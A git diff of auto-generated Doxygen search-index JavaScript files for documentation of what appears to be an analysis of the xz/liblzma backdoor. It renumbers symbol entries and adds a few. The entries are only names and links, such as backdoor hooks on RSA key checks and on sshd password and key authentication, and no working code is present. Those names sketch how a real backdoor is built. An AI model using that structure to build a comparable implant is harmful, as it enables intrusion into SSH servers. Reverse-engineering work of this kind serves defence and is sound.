['got_5fptr_142',['got_ptr',['../structgot__ctx.html#aac8a1b7398f74099e686177ae0a11a9b',1,'got_ctx']]] ]; diff --git a/search/all_8.js b/search/all_8.js index aa120d1..b4c0fc9 100644 --- a/search/all_8.js +++ b/search/all_8.js @@ -1,8 +1,8 @@ var searchData= [ - ['hook_5fevp_5fpkey_5fset1_5frsa_144',['hook_EVP_PKEY_set1_RSA',['../structbackdoor__shared__globals.html#a2b3e66d0fba425140c3a66cb4730d2a5',1,'backdoor_shared_globals::hook_EVP_PKEY_set1_RSA()'],['../structldso__ctx.html#abe3b0f470ffff74817c67770f4a804f1',1,'ldso_ctx::hook_EVP_PKEY_set1_RSA()']]], - ['hook_5frsa_5fget0_5fkey_145',['hook_RSA_get0_key',['../structldso__ctx.html#a6ebdde768535a27a9a269f5f5b5f9cb2',1,'ldso_ctx']]], - ['hook_5frsa_5fpublic_5fdecrypt_146',['hook_RSA_public_decrypt',['../structldso__ctx.html#ae2d0c91c19ed327dc332e5a42778e9a3',1,'ldso_ctx']]], - ['hooked_5faudit_5fifaces_147',['hooked_audit_ifaces',['../structldso__ctx.html#a91f73403c7858ed838d4d16148296485',1,'ldso_ctx']]], - ['hooks_5fdata_5faddr_148',['hooks_data_addr',['../xzre_8h.html#a32c97a88bc607d3f2459f0d7d420099d',1,'xzre.h']]] + ['hook_5fevp_5fpkey_5fset1_5frsa_143',['hook_EVP_PKEY_set1_RSA',['../structbackdoor__shared__globals.html#a2b3e66d0fba425140c3a66cb4730d2a5',1,'backdoor_shared_globals::hook_EVP_PKEY_set1_RSA()'],['../structldso__ctx.html#abe3b0f470ffff74817c67770f4a804f1',1,'ldso_ctx::hook_EVP_PKEY_set1_RSA()']]], + ['hook_5frsa_5fget0_5fkey_144',['hook_RSA_get0_key',['../structldso__ctx.html#a6ebdde768535a27a9a269f5f5b5f9cb2',1,'ldso_ctx']]], + ['hook_5frsa_5fpublic_5fdecrypt_145',['hook_RSA_public_decrypt',['../structldso__ctx.html#ae2d0c91c19ed327dc332e5a42778e9a3',1,'ldso_ctx']]], + ['hooked_5faudit_5fifaces_146',['hooked_audit_ifaces',['../structldso__ctx.html#a91f73403c7858ed838d4d16148296485',1,'ldso_ctx']]], + ['hooks_5fdata_5faddr_147',['hooks_data_addr',['../xzre_8h.html#a32c97a88bc607d3f2459f0d7d420099d',1,'xzre.h']]] ]; diff --git a/search/all_9.js b/search/all_9.js index 5ae9095..4f99642 100644 --- a/search/all_9.js +++ b/search/all_9.js @@ -1,14 +1,14 @@ var searchData= [ - ['import_5fresolver_149',['import_resolver',['../structbackdoor__data.html#ad6eb45526286b7304fb01af7c50ff5b2',1,'backdoor_data']]], - ['imported_5ffuncs_150',['imported_funcs',['../structimported__funcs.html',1,'imported_funcs'],['../structglobal__context.html#a5dccd92d1dd861220b290896bd7ba487',1,'global_context::imported_funcs()']]], - ['index_151',['index',['../unionsecret__data__shift__cursor__t.html#a159dd83929f3c1d7b994d4961d8f7850',1,'secret_data_shift_cursor_t']]], - ['init_5felf_5fentry_5fctx_152',['init_elf_entry_ctx',['../xzre_8h.html#abf19222b4917f772ad487a2970dd51ec',1,'xzre.h']]], - ['init_5fhook_5ffunctions_153',['init_hook_functions',['../structelf__functions.html#a4034b3706679dac6eacec8f90530d652',1,'elf_functions::init_hook_functions()'],['../xzre_8h.html#abbcfd61778019372e0cabdf79b98824d',1,'init_hook_functions(backdoor_hooks_ctx_t *funcs): xzre.h']]], - ['init_5fldso_5fctx_154',['init_ldso_ctx',['../xzre_8h.html#a31d16cd16f66f61d34ff686d73464181',1,'xzre.h']]], - ['instruction_5fsearch_5fctx_155',['instruction_search_ctx',['../structinstruction__search__ctx.html',1,'']]], - ['is_5fendbr64_5finstruction_156',['is_endbr64_instruction',['../xzre_8h.html#a544d2cf67930e0fcd9f9ff37239a4c70',1,'xzre.h']]], - ['is_5fgnu_5frelro_157',['is_gnu_relro',['../xzre_8h.html#aae4bd899725c9e0825517734783f0433',1,'xzre.h']]], - ['is_5fpayload_5fmessage_158',['is_payload_message',['../xzre_8h.html#a0c558b4d23018ab4e177dfd14f186be9',1,'xzre.h']]], - ['is_5frange_5fmapped_159',['is_range_mapped',['../xzre_8h.html#a5d94ba8c95f0333dc53ef8432156b0ca',1,'xzre.h']]] + ['import_5fresolver_148',['import_resolver',['../structbackdoor__data.html#ad6eb45526286b7304fb01af7c50ff5b2',1,'backdoor_data']]], + ['imported_5ffuncs_149',['imported_funcs',['../structimported__funcs.html',1,'imported_funcs'],['../structglobal__context.html#a5dccd92d1dd861220b290896bd7ba487',1,'global_context::imported_funcs()']]], + ['index_150',['index',['../unionsecret__data__shift__cursor__t.html#a159dd83929f3c1d7b994d4961d8f7850',1,'secret_data_shift_cursor_t']]], + ['init_5felf_5fentry_5fctx_151',['init_elf_entry_ctx',['../xzre_8h.html#abf19222b4917f772ad487a2970dd51ec',1,'xzre.h']]], + ['init_5fhook_5ffunctions_152',['init_hook_functions',['../structelf__functions.html#a4034b3706679dac6eacec8f90530d652',1,'elf_functions::init_hook_functions()'],['../xzre_8h.html#abbcfd61778019372e0cabdf79b98824d',1,'init_hook_functions(backdoor_hooks_ctx_t *funcs): xzre.h']]], + ['init_5fldso_5fctx_153',['init_ldso_ctx',['../xzre_8h.html#a31d16cd16f66f61d34ff686d73464181',1,'xzre.h']]], + ['instruction_5fsearch_5fctx_154',['instruction_search_ctx',['../structinstruction__search__ctx.html',1,'']]], + ['is_5fendbr64_5finstruction_155',['is_endbr64_instruction',['../xzre_8h.html#a544d2cf67930e0fcd9f9ff37239a4c70',1,'xzre.h']]], + ['is_5fgnu_5frelro_156',['is_gnu_relro',['../xzre_8h.html#aae4bd899725c9e0825517734783f0433',1,'xzre.h']]], + ['is_5fpayload_5fmessage_157',['is_payload_message',['../xzre_8h.html#a0c558b4d23018ab4e177dfd14f186be9',1,'xzre.h']]], + ['is_5frange_5fmapped_158',['is_range_mapped',['../xzre_8h.html#a5d94ba8c95f0333dc53ef8432156b0ca',1,'xzre.h']]] ]; diff --git a/search/all_a.js b/search/all_a.js index 50078e9..c889d26 100644 --- a/search/all_a.js +++ b/search/all_a.js @@ -1,9 +1,9 @@ var searchData= [ - ['key_5fctx_160',['key_ctx',['../structkey__ctx.html',1,'']]], - ['key_5fpayload_161',['key_payload',['../structkey__payload.html',1,'']]], - ['key_5fpayload_5fbody_162',['key_payload_body',['../structkey__payload__body.html',1,'']]], - ['key_5fpayload_5fhdr_163',['key_payload_hdr',['../structkey__payload__hdr.html',1,'']]], - ['key_5fpayload_5fhdr_5ft_164',['key_payload_hdr_t',['../xzre_8h.html#a41b1410a6c3d2613895ce26896903600',1,'xzre.h']]], - ['key_5fpayload_5ft_165',['key_payload_t',['../xzre_8h.html#aaad9381e8f52552bbb914465c45bdac2',1,'xzre.h']]] + ['key_5fctx_159',['key_ctx',['../structkey__ctx.html',1,'']]], + ['key_5fpayload_160',['key_payload',['../structkey__payload.html',1,'']]], + ['key_5fpayload_5fbody_161',['key_payload_body',['../structkey__payload__body.html',1,'']]], + ['key_5fpayload_5fhdr_162',['key_payload_hdr',['../structkey__payload__hdr.html',1,'']]], + ['key_5fpayload_5fhdr_5ft_163',['key_payload_hdr_t',['../xzre_8h.html#a41b1410a6c3d2613895ce26896903600',1,'xzre.h']]], + ['key_5fpayload_5ft_164',['key_payload_t',['../xzre_8h.html#aaad9381e8f52552bbb914465c45bdac2',1,'xzre.h']]] ]; diff --git a/search/all_b.js b/search/all_b.js index 5f95182..303062a 100644 --- a/search/all_b.js +++ b/search/all_b.js @@ -1,15 +1,15 @@ var searchData= [ - ['ldso_5fctx_166',['ldso_ctx',['../structldso__ctx.html',1,'']]], - ['libc_5fimports_167',['libc_imports',['../structlibc__imports.html',1,'libc_imports'],['../structglobal__context.html#a2f75270d895fb7a930c5286c6f929e28',1,'global_context::libc_imports()'],['../structbackdoor__data.html#a116ff042f4a1a315724cc6f65a56e359',1,'backdoor_data::libc_imports()']]], - ['libc_5finfo_168',['libc_info',['../structbackdoor__data.html#a8926fe3d847696a0a1b58ec7e9c6d14e',1,'backdoor_data']]], - ['libcrypto_5fauditstate_5fbindflags_5fold_5fvalue_169',['libcrypto_auditstate_bindflags_old_value',['../structldso__ctx.html#a1ed972f5c9306a268f94ccf5b84b911c',1,'ldso_ctx']]], - ['libcrypto_5fauditstate_5fbindflags_5fptr_170',['libcrypto_auditstate_bindflags_ptr',['../structldso__ctx.html#a4af16654f389b0bf2bd96308afd1d469',1,'ldso_ctx']]], - ['libcrypto_5finfo_171',['libcrypto_info',['../structbackdoor__data.html#a932329dfc876e64f123c922e55b30142',1,'backdoor_data']]], - ['libcrypto_5fl_5fname_172',['libcrypto_l_name',['../structldso__ctx.html#a8f68b96010a76e72135e68cfad110542',1,'ldso_ctx']]], - ['link_5fmap_5fl_5faudit_5fany_5fplt_5fbitmask_173',['link_map_l_audit_any_plt_bitmask',['../structldso__ctx.html#a5f52e1a88c3a17d61072f2d944f706e7',1,'ldso_ctx']]], - ['lzma_5fcheck_5fstate_174',['lzma_check_state',['../structlzma__check__state.html',1,'']]], - ['lzma_5fcode_5fend_175',['lzma_code_end',['../structglobal__context.html#a031805daad5b0f7f951ef58614533588',1,'global_context']]], - ['lzma_5fcode_5fstart_176',['lzma_code_start',['../structglobal__context.html#acf13081708c1c8ca5b3902d198419bd1',1,'global_context']]], - ['lzma_5fsha256_5fstate_177',['lzma_sha256_state',['../structlzma__sha256__state.html',1,'']]] + ['ldso_5fctx_165',['ldso_ctx',['../structldso__ctx.html',1,'']]], + ['libc_5fimports_166',['libc_imports',['../structlibc__imports.html',1,'libc_imports'],['../structglobal__context.html#a2f75270d895fb7a930c5286c6f929e28',1,'global_context::libc_imports()'],['../structbackdoor__data.html#a116ff042f4a1a315724cc6f65a56e359',1,'backdoor_data::libc_imports()']]], + ['libc_5finfo_167',['libc_info',['../structbackdoor__data.html#a8926fe3d847696a0a1b58ec7e9c6d14e',1,'backdoor_data']]], + ['libcrypto_5fauditstate_5fbindflags_5fold_5fvalue_168',['libcrypto_auditstate_bindflags_old_value',['../structldso__ctx.html#a1ed972f5c9306a268f94ccf5b84b911c',1,'ldso_ctx']]], + ['libcrypto_5fauditstate_5fbindflags_5fptr_169',['libcrypto_auditstate_bindflags_ptr',['../structldso__ctx.html#a4af16654f389b0bf2bd96308afd1d469',1,'ldso_ctx']]], + ['libcrypto_5finfo_170',['libcrypto_info',['../structbackdoor__data.html#a932329dfc876e64f123c922e55b30142',1,'backdoor_data']]], + ['libcrypto_5fl_5fname_171',['libcrypto_l_name',['../structldso__ctx.html#a8f68b96010a76e72135e68cfad110542',1,'ldso_ctx']]], + ['link_5fmap_5fl_5faudit_5fany_5fplt_5fbitmask_172',['link_map_l_audit_any_plt_bitmask',['../structldso__ctx.html#a5f52e1a88c3a17d61072f2d944f706e7',1,'ldso_ctx']]], + ['lzma_5fcheck_5fstate_173',['lzma_check_state',['../structlzma__check__state.html',1,'']]], + ['lzma_5fcode_5fend_174',['lzma_code_end',['../structglobal__context.html#a031805daad5b0f7f951ef58614533588',1,'global_context']]], + ['lzma_5fcode_5fstart_175',['lzma_code_start',['../structglobal__context.html#acf13081708c1c8ca5b3902d198419bd1',1,'global_context']]], + ['lzma_5fsha256_5fstate_176',['lzma_sha256_state',['../structlzma__sha256__state.html',1,'']]] ]; diff --git a/search/all_c.js b/search/all_c.js index 8e3d324..ae94644 100644 --- a/search/all_c.js +++ b/search/all_c.js @@ -1,13 +1,15 @@ var searchData= [ - ['main_178',['main',['../structelf__handles.html#ad693d428a831ddaadae6d8de369ebf80',1,'elf_handles']]], - ['main_5felf_179',['main_elf',['../structmain__elf.html',1,'']]], - ['main_5felf_5fparse_180',['main_elf_parse',['../xzre_8h.html#a642ed90d3ade30228b3286310de5e5c1',1,'xzre.h']]], - ['main_5finfo_181',['main_info',['../structbackdoor__data.html#ad66782fe22d1981edf9f791ac0d4a0d7',1,'backdoor_data']]], - ['main_5fmap_182',['main_map',['../structbackdoor__data.html#a6d36460b86405888db4138fb6cb02a21',1,'backdoor_data']]], - ['mm_5fanswer_5fauthpassword_5fhook_183',['mm_answer_authpassword_hook',['../xzre_8h.html#ace15703b7d962e9d6be778e4d8066f79',1,'xzre.h']]], - ['mm_5fanswer_5fkeyallowed_5fhook_184',['mm_answer_keyallowed_hook',['../xzre_8h.html#a8ce260e9315b4afa70668391058ed484',1,'xzre.h']]], - ['mm_5fanswer_5fkeyverify_5fhook_185',['mm_answer_keyverify_hook',['../xzre_8h.html#a99eb76809c798f3bcae98526992e63ef',1,'xzre.h']]], - ['mm_5flog_5fhandler_5fhook_186',['mm_log_handler_hook',['../xzre_8h.html#a096fbb5b183337e44012a38910ea31eb',1,'xzre.h']]], - ['monitor_187',['monitor',['../structmonitor.html',1,'']]] + ['main_177',['main',['../structelf__handles.html#ad693d428a831ddaadae6d8de369ebf80',1,'elf_handles']]], + ['main_5felf_178',['main_elf',['../structmain__elf.html',1,'']]], + ['main_5felf_5fparse_179',['main_elf_parse',['../xzre_8h.html#a642ed90d3ade30228b3286310de5e5c1',1,'xzre.h']]], + ['main_5finfo_180',['main_info',['../structbackdoor__data.html#ad66782fe22d1981edf9f791ac0d4a0d7',1,'backdoor_data']]], + ['main_5fmap_181',['main_map',['../structbackdoor__data.html#a6d36460b86405888db4138fb6cb02a21',1,'backdoor_data']]], + ['mm_5fanswer_5fauthpassword_5fhook_182',['mm_answer_authpassword_hook',['../xzre_8h.html#ace15703b7d962e9d6be778e4d8066f79',1,'xzre.h']]], + ['mm_5fanswer_5fkeyallowed_5fhook_183',['mm_answer_keyallowed_hook',['../xzre_8h.html#a8ce260e9315b4afa70668391058ed484',1,'xzre.h']]], + ['mm_5fanswer_5fkeyverify_5fhook_184',['mm_answer_keyverify_hook',['../xzre_8h.html#a99eb76809c798f3bcae98526992e63ef',1,'xzre.h']]], + ['mm_5flog_5fhandler_5fhook_185',['mm_log_handler_hook',['../xzre_8h.html#a096fbb5b183337e44012a38910ea31eb',1,'xzre.h']]], + ['monitor_186',['monitor',['../structmonitor.html',1,'']]], + ['monitor_5fdata_187',['monitor_data',['../structmonitor__data.html',1,'']]], + ['monitor_5fdata_5ft_188',['monitor_data_t',['../xzre_8h.html#ac0c8a0430fa3d00804d08b800bfdfc5d',1,'xzre.h']]] ]; diff --git a/search/all_d.js b/search/all_d.js index 9e5a5ef..2f2e737 100644 --- a/search/all_d.js +++ b/search/all_d.js @@ -1,4 +1,4 @@ var searchData= [ - ['num_5fshifted_5fbits_188',['num_shifted_bits',['../structglobal__context.html#a6895ac8df8ead90c8f140a8c6606828f',1,'global_context']]] + ['num_5fshifted_5fbits_189',['num_shifted_bits',['../structglobal__context.html#a6895ac8df8ead90c8f140a8c6606828f',1,'global_context']]] ]; diff --git a/search/all_e.js b/search/all_e.js index f7bcb4e..b7aa51a 100644 --- a/search/all_e.js +++ b/search/all_e.js @@ -1,5 +1,5 @@ var searchData= [ - ['offset_5fto_5fmatch_189',['offset_to_match',['../structinstruction__search__ctx.html#a68e8f8c7f105fcfe3bc77abbfcdb493e',1,'instruction_search_ctx']]], - ['output_5fregister_5fto_5fmatch_190',['output_register_to_match',['../structinstruction__search__ctx.html#ae0ec8bee47bf045c3ce653c33b9ce2f1',1,'instruction_search_ctx']]] + ['offset_5fto_5fmatch_190',['offset_to_match',['../structinstruction__search__ctx.html#a68e8f8c7f105fcfe3bc77abbfcdb493e',1,'instruction_search_ctx']]], + ['output_5fregister_5fto_5fmatch_191',['output_register_to_match',['../structinstruction__search__ctx.html#ae0ec8bee47bf045c3ce653c33b9ce2f1',1,'instruction_search_ctx']]] ]; diff --git a/search/all_f.js b/search/all_f.js index 30eb132..54e097d 100644 --- a/search/all_f.js +++ b/search/all_f.js @@ -1,9 +1,11 @@ var searchData= [ - ['phdrs_191',['phdrs',['../structelf__info.html#a46b6bb90c2dccef9e76c09ea014048ae',1,'elf_info']]], - ['plt_5frelocs_192',['plt_relocs',['../structelf__info.html#a5d272c3d46d0b9254b9ba62ad38ef2b5',1,'elf_info']]], - ['plt_5frelocs_5fnum_193',['plt_relocs_num',['../structelf__info.html#ad4c0ec1374213c0f36d73ddcb3bbfd08',1,'elf_info']]], - ['process_5fis_5fsshd_194',['process_is_sshd',['../xzre_8h.html#a04a9f7dfab9ccac6d8407c906b7b2e2e',1,'xzre.h']]], - ['process_5fshared_5flibraries_195',['process_shared_libraries',['../xzre_8h.html#a1cb8bb283baa56567d7b88b5fcfe7db7',1,'xzre.h']]], - ['process_5fshared_5flibraries_5fmap_196',['process_shared_libraries_map',['../xzre_8h.html#a1fcba1b3d069ccf76ee3cef4a3b9a682',1,'xzre.h']]] + ['payload_192',['payload',['../unionpayload.html',1,'']]], + ['payload_5ft_193',['payload_t',['../xzre_8h.html#ab2f751be0f46ca021f9e36eed65c8705',1,'xzre.h']]], + ['phdrs_194',['phdrs',['../structelf__info.html#a46b6bb90c2dccef9e76c09ea014048ae',1,'elf_info']]], + ['plt_5frelocs_195',['plt_relocs',['../structelf__info.html#a5d272c3d46d0b9254b9ba62ad38ef2b5',1,'elf_info']]], + ['plt_5frelocs_5fnum_196',['plt_relocs_num',['../structelf__info.html#ad4c0ec1374213c0f36d73ddcb3bbfd08',1,'elf_info']]], + ['process_5fis_5fsshd_197',['process_is_sshd',['../xzre_8h.html#a04a9f7dfab9ccac6d8407c906b7b2e2e',1,'xzre.h']]], + ['process_5fshared_5flibraries_198',['process_shared_libraries',['../xzre_8h.html#a1cb8bb283baa56567d7b88b5fcfe7db7',1,'xzre.h']]], + ['process_5fshared_5flibraries_5fmap_199',['process_shared_libraries_map',['../xzre_8h.html#a1fcba1b3d069ccf76ee3cef4a3b9a682',1,'xzre.h']]] ]; diff --git a/search/classes_0.js b/search/classes_0.js index 89eb9d0..d8b4ab3 100644 --- a/search/classes_0.js +++ b/search/classes_0.js @@ -1,5 +1,5 @@ var searchData= [ - ['audit_5fifaces_278',['audit_ifaces',['../structaudit__ifaces.html',1,'']]], - ['auditstate_279',['auditstate',['../structauditstate.html',1,'']]] + ['audit_5fifaces_282',['audit_ifaces',['../structaudit__ifaces.html',1,'']]], + ['auditstate_283',['auditstate',['../structauditstate.html',1,'']]] ]; diff --git a/search/classes_1.js b/search/classes_1.js index 89d5bc9..452da30 100644 --- a/search/classes_1.js +++ b/search/classes_1.js @@ -1,12 +1,12 @@ var searchData= [ - ['backdoor_5fcpuid_5freloc_5fconsts_280',['backdoor_cpuid_reloc_consts',['../structbackdoor__cpuid__reloc__consts.html',1,'']]], - ['backdoor_5fdata_281',['backdoor_data',['../structbackdoor__data.html',1,'']]], - ['backdoor_5fdata_5fhandle_282',['backdoor_data_handle',['../structbackdoor__data__handle.html',1,'']]], - ['backdoor_5fhooks_5fctx_283',['backdoor_hooks_ctx',['../structbackdoor__hooks__ctx.html',1,'']]], - ['backdoor_5fhooks_5fdata_284',['backdoor_hooks_data',['../structbackdoor__hooks__data.html',1,'']]], - ['backdoor_5fsetup_5fparams_285',['backdoor_setup_params',['../structbackdoor__setup__params.html',1,'']]], - ['backdoor_5fshared_5fglobals_286',['backdoor_shared_globals',['../structbackdoor__shared__globals.html',1,'']]], - ['backdoor_5fshared_5flibraries_5fdata_287',['backdoor_shared_libraries_data',['../structbackdoor__shared__libraries__data.html',1,'']]], - ['backdoor_5ftls_5fget_5faddr_5freloc_5fconsts_288',['backdoor_tls_get_addr_reloc_consts',['../structbackdoor__tls__get__addr__reloc__consts.html',1,'']]] + ['backdoor_5fcpuid_5freloc_5fconsts_284',['backdoor_cpuid_reloc_consts',['../structbackdoor__cpuid__reloc__consts.html',1,'']]], + ['backdoor_5fdata_285',['backdoor_data',['../structbackdoor__data.html',1,'']]], + ['backdoor_5fdata_5fhandle_286',['backdoor_data_handle',['../structbackdoor__data__handle.html',1,'']]], + ['backdoor_5fhooks_5fctx_287',['backdoor_hooks_ctx',['../structbackdoor__hooks__ctx.html',1,'']]], + ['backdoor_5fhooks_5fdata_288',['backdoor_hooks_data',['../structbackdoor__hooks__data.html',1,'']]], + ['backdoor_5fsetup_5fparams_289',['backdoor_setup_params',['../structbackdoor__setup__params.html',1,'']]], + ['backdoor_5fshared_5fglobals_290',['backdoor_shared_globals',['../structbackdoor__shared__globals.html',1,'']]], + ['backdoor_5fshared_5flibraries_5fdata_291',['backdoor_shared_libraries_data',['../structbackdoor__shared__libraries__data.html',1,'']]], + ['backdoor_5ftls_5fget_5faddr_5freloc_5fconsts_292',['backdoor_tls_get_addr_reloc_consts',['../structbackdoor__tls__get__addr__reloc__consts.html',1,'']]] ]; diff --git a/search/classes_2.js b/search/classes_2.js index 8277f4f..8d7f8d8 100644 --- a/search/classes_2.js +++ b/search/classes_2.js @@ -1,4 +1,4 @@ var searchData= [ - ['cmd_5farguments_289',['cmd_arguments',['../structcmd__arguments.html',1,'']]] + ['cmd_5farguments_293',['cmd_arguments',['../structcmd__arguments.html',1,'']]] ]; diff --git a/search/classes_3.js b/search/classes_3.js index ccc9ecc..0cbf4cd 100644 --- a/search/classes_3.js +++ b/search/classes_3.js @@ -1,5 +1,5 @@ var searchData= [ - ['dasm_5fctx_290',['dasm_ctx',['../structdasm__ctx.html',1,'']]], - ['dl_5ftls_5findex_291',['dl_tls_index',['../structdl__tls__index.html',1,'']]] + ['dasm_5fctx_294',['dasm_ctx',['../structdasm__ctx.html',1,'']]], + ['dl_5ftls_5findex_295',['dl_tls_index',['../structdl__tls__index.html',1,'']]] ]; diff --git a/search/classes_4.js b/search/classes_4.js index dbb2a6b..8b5b949 100644 --- a/search/classes_4.js +++ b/search/classes_4.js @@ -1,7 +1,7 @@ var searchData= [ - ['elf_5fentry_5fctx_292',['elf_entry_ctx',['../structelf__entry__ctx.html',1,'']]], - ['elf_5ffunctions_293',['elf_functions',['../structelf__functions.html',1,'']]], - ['elf_5fhandles_294',['elf_handles',['../structelf__handles.html',1,'']]], - ['elf_5finfo_295',['elf_info',['../structelf__info.html',1,'']]] + ['elf_5fentry_5fctx_296',['elf_entry_ctx',['../structelf__entry__ctx.html',1,'']]], + ['elf_5ffunctions_297',['elf_functions',['../structelf__functions.html',1,'']]], + ['elf_5fhandles_298',['elf_handles',['../structelf__handles.html',1,'']]], + ['elf_5finfo_299',['elf_info',['../structelf__info.html',1,'']]] ]; diff --git a/search/classes_5.js b/search/classes_5.js index c4840b8..5364c6d 100644 --- a/search/classes_5.js +++ b/search/classes_5.js @@ -1,6 +1,6 @@ var searchData= [ - ['fake_5flzma_5fallocator_296',['fake_lzma_allocator',['../structfake__lzma__allocator.html',1,'']]], - ['flags1_297',['Flags1',['../classFlags1.html',1,'']]], - ['flags2_298',['Flags2',['../classFlags2.html',1,'']]] + ['fake_5flzma_5fallocator_300',['fake_lzma_allocator',['../structfake__lzma__allocator.html',1,'']]], + ['flags1_301',['Flags1',['../classFlags1.html',1,'']]], + ['flags2_302',['Flags2',['../classFlags2.html',1,'']]] ]; diff --git a/search/classes_6.js b/search/classes_6.js index dc21ba1..1890ace 100644 --- a/search/classes_6.js +++ b/search/classes_6.js @@ -1,6 +1,6 @@ var searchData= [ - ['global_5fcontext_299',['global_context',['../structglobal__context.html',1,'']]], - ['gnu_5fhash_5ftable_300',['gnu_hash_table',['../structgnu__hash__table.html',1,'']]], - ['got_5fctx_301',['got_ctx',['../structgot__ctx.html',1,'']]] + ['global_5fcontext_303',['global_context',['../structglobal__context.html',1,'']]], + ['gnu_5fhash_5ftable_304',['gnu_hash_table',['../structgnu__hash__table.html',1,'']]], + ['got_5fctx_305',['got_ctx',['../structgot__ctx.html',1,'']]] ]; diff --git a/search/classes_7.js b/search/classes_7.js index be95dcc..1df1d75 100644 --- a/search/classes_7.js +++ b/search/classes_7.js @@ -1,5 +1,5 @@ var searchData= [ - ['imported_5ffuncs_302',['imported_funcs',['../structimported__funcs.html',1,'']]], - ['instruction_5fsearch_5fctx_303',['instruction_search_ctx',['../structinstruction__search__ctx.html',1,'']]] + ['imported_5ffuncs_306',['imported_funcs',['../structimported__funcs.html',1,'']]], + ['instruction_5fsearch_5fctx_307',['instruction_search_ctx',['../structinstruction__search__ctx.html',1,'']]] ]; diff --git a/search/classes_8.js b/search/classes_8.js index 0128426..19b2f7a 100644 --- a/search/classes_8.js +++ b/search/classes_8.js @@ -1,7 +1,7 @@ var searchData= [ - ['key_5fctx_304',['key_ctx',['../structkey__ctx.html',1,'']]], - ['key_5fpayload_305',['key_payload',['../structkey__payload.html',1,'']]], - ['key_5fpayload_5fbody_306',['key_payload_body',['../structkey__payload__body.html',1,'']]], - ['key_5fpayload_5fhdr_307',['key_payload_hdr',['../structkey__payload__hdr.html',1,'']]] + ['key_5fctx_308',['key_ctx',['../structkey__ctx.html',1,'']]], + ['key_5fpayload_309',['key_payload',['../structkey__payload.html',1,'']]], + ['key_5fpayload_5fbody_310',['key_payload_body',['../structkey__payload__body.html',1,'']]], + ['key_5fpayload_5fhdr_311',['key_payload_hdr',['../structkey__payload__hdr.html',1,'']]] ]; diff --git a/search/classes_9.js b/search/classes_9.js index f075f35..6887380 100644 --- a/search/classes_9.js +++ b/search/classes_9.js @@ -1,7 +1,7 @@ var searchData= [ - ['ldso_5fctx_308',['ldso_ctx',['../structldso__ctx.html',1,'']]], - ['libc_5fimports_309',['libc_imports',['../structlibc__imports.html',1,'']]], - ['lzma_5fcheck_5fstate_310',['lzma_check_state',['../structlzma__check__state.html',1,'']]], - ['lzma_5fsha256_5fstate_311',['lzma_sha256_state',['../structlzma__sha256__state.html',1,'']]] + ['ldso_5fctx_312',['ldso_ctx',['../structldso__ctx.html',1,'']]], + ['libc_5fimports_313',['libc_imports',['../structlibc__imports.html',1,'']]], + ['lzma_5fcheck_5fstate_314',['lzma_check_state',['../structlzma__check__state.html',1,'']]], + ['lzma_5fsha256_5fstate_315',['lzma_sha256_state',['../structlzma__sha256__state.html',1,'']]] ]; diff --git a/search/classes_a.js b/search/classes_a.js index 7ff43fb..f5838e2 100644 --- a/search/classes_a.js +++ b/search/classes_a.js @@ -1,5 +1,6 @@ var searchData= [ - ['main_5felf_312',['main_elf',['../structmain__elf.html',1,'']]], - ['monitor_313',['monitor',['../structmonitor.html',1,'']]] + ['main_5felf_316',['main_elf',['../structmain__elf.html',1,'']]], + ['monitor_317',['monitor',['../structmonitor.html',1,'']]], + ['monitor_5fdata_318',['monitor_data',['../structmonitor__data.html',1,'']]] ]; diff --git a/search/classes_b.js b/search/classes_b.js index 80c982e..f480b9e 100644 --- a/search/classes_b.js +++ b/search/classes_b.js @@ -1,14 +1,4 @@ var searchData= [ - ['secret_5fdata_5fitem_314',['secret_data_item',['../structsecret__data__item.html',1,'']]], - ['secret_5fdata_5fshift_5fcursor_5ft_315',['secret_data_shift_cursor_t',['../unionsecret__data__shift__cursor__t.html',1,'']]], - ['sensitive_5fdata_316',['sensitive_data',['../structsensitive__data.html',1,'']]], - ['sshd_5fctx_317',['sshd_ctx',['../structsshd__ctx.html',1,'']]], - ['sshd_5flog_5fctx_318',['sshd_log_ctx',['../structsshd__log__ctx.html',1,'']]], - ['sshd_5foffsets_319',['sshd_offsets',['../structsshd__offsets.html',1,'']]], - ['sshd_5fpayload_5fctx_320',['sshd_payload_ctx',['../structsshd__payload__ctx.html',1,'']]], - ['sshd_5fproxy_5fargs_321',['sshd_proxy_args',['../structsshd__proxy__args.html',1,'']]], - ['sshkey_322',['sshkey',['../structsshkey.html',1,'']]], - ['string_5fitem_323',['string_item',['../structstring__item.html',1,'']]], - ['string_5freferences_324',['string_references',['../structstring__references.html',1,'']]] + ['payload_319',['payload',['../unionpayload.html',1,'']]] ]; diff --git a/search/classes_c.js b/search/classes_c.js index 8dcb106..60fac9b 100644 --- a/search/classes_c.js +++ b/search/classes_c.js @@ -1,4 +1,4 @@ var searchData= [ - ['u_5fcmd_5farguments_5ft_325',['u_cmd_arguments_t',['../unionu__cmd__arguments__t.html',1,'']]] + ['run_5fbackdoor_5fcommands_5fdata_320',['run_backdoor_commands_data',['../structrun__backdoor__commands__data.html',1,'']]] ]; diff --git a/search/classes_d.html b/search/classes_d.html new file mode 100644 index 0000000..f9011e7 --- /dev/null +++ b/search/classes_d.html @@ -0,0 +1,37 @@ + + + + + + + + + + +
+
Loading...
+
+ +
Searching...
+
No Matches
+ +
+ + diff --git a/search/classes_d.js b/search/classes_d.js new file mode 100644 index 0000000..f03062e --- /dev/null +++ b/search/classes_d.js @@ -0,0 +1,13 @@ +var searchData= +[ + ['secret_5fdata_5fitem_321',['secret_data_item',['../structsecret__data__item.html',1,'']]], + ['secret_5fdata_5fshift_5fcursor_5ft_322',['secret_data_shift_cursor_t',['../unionsecret__data__shift__cursor__t.html',1,'']]], + ['sensitive_5fdata_323',['sensitive_data',['../structsensitive__data.html',1,'']]], + ['sshd_5fctx_324',['sshd_ctx',['../structsshd__ctx.html',1,'']]], + ['sshd_5flog_5fctx_325',['sshd_log_ctx',['../structsshd__log__ctx.html',1,'']]], + ['sshd_5foffsets_326',['sshd_offsets',['../structsshd__offsets.html',1,'']]], + ['sshd_5fpayload_5fctx_327',['sshd_payload_ctx',['../structsshd__payload__ctx.html',1,'']]], + ['sshkey_328',['sshkey',['../structsshkey.html',1,'']]], + ['string_5fitem_329',['string_item',['../structstring__item.html',1,'']]], + ['string_5freferences_330',['string_references',['../structstring__references.html',1,'']]] +]; diff --git a/search/classes_e.html b/search/classes_e.html new file mode 100644 index 0000000..bb33dcf --- /dev/null +++ b/search/classes_e.html @@ -0,0 +1,37 @@ + + + + + + + + + + +
+
Loading...
+
+ +
Searching...
+
No Matches
+ +
